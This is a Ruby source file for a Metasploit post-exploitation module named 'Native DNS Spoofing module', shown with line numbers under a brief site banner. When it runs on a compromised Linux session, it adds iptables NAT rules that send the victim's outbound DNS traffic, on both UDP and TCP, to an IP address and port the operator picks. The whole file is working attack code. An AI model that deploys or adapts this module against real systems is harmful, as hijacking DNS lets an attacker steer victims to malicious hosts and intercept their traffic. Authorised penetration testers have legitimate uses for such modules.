Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Linux::System
9

10
  def initialize
11
    super(
12
      'Name' => 'Native DNS Spoofing module',
13
      'Description' => %q{
14
        This module will be applied on a session connected to a shell. It will redirect DNS Request to remote DNS server.
15
      },
16
      'Author' => 'Alberto Rafael Rodriguez Iglesias <albertocysec[at]gmail.com>',
17
      'License' => MSF_LICENSE,
18
      'Platform' => ['linux'],
19
      'SessionTypes' => ['shell', 'meterpreter']
20
    )
21
    register_options(
22
      [
23
        OptString.new('ORIGIN_PORT', [true, 'Origin port', '53']),
24
        OptString.new('DESTINY_PORT', [true, 'Destination port', '53']),
25
        OptAddress.new('DESTINY_IP', [true, 'Needed', '8.8.8.8'])
26
      ]
27
    )
28
  end
29

30
  def run
31
    print_good('Spoofing DNS server...')
32
    cmd_exec("iptables -t nat -A OUTPUT -p udp --dport #{datastore['ORIGIN_PORT']} -j DNAT --to #{datastore['DESTINY_IP']}:#{datastore['DESTINY_PORT']}")
33
    cmd_exec("iptables -t nat -A OUTPUT -p tcp --dport #{datastore['ORIGIN_PORT']} -j DNAT --to #{datastore['DESTINY_IP']}:#{datastore['DESTINY_PORT']}")
34
    print_good('Successfully exploited.')
35
  end
36
end
37

38